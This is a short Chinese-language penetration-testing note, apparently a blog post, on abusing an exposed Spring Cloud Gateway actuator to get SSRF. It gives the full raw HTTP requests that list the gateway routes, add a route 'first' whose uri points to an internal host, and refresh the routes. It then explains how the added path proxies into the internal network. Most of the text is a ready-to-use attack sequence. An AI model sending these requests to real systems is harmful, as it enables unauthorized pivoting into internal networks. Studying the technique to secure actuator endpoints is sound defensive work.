Spring添加路由实现ssrf
在某个项目中遇到的gateway接口不支持spel表达式执行命令,但是通过实现ssrf内网漫游
查看Gateway/routedefinitions接口可以查看到所有的路由
GET /api/actuator/gateway/routedefinitions HTTP/2
Host: localhost
Content-Length: 0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
修改http://xxxxxxx/为内网地址
POST /api/actuator/gateway/routes/first HTTP/2
Host: localhost
Content-Length: 243
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{
"id": "first",
"predicates": [{
"name": "Path",
"args": {"_genkey_0":"/api/aliyuncer/**"}
}],
"filters": [
"StripPrefix=2"
],
"uri": "http://xxxxxxx/",
"order": -1
}
POST /api/actuator/refresh HTTP/2
Host: localhost
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: application/json, text/plain, */*
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Type: application/json
Content-Length: 0
之后访问/api/aliyuncer/即为内网http://xxxxxxx/,通过burp编写替换路径的规则可以实现很方便访问内网的方法。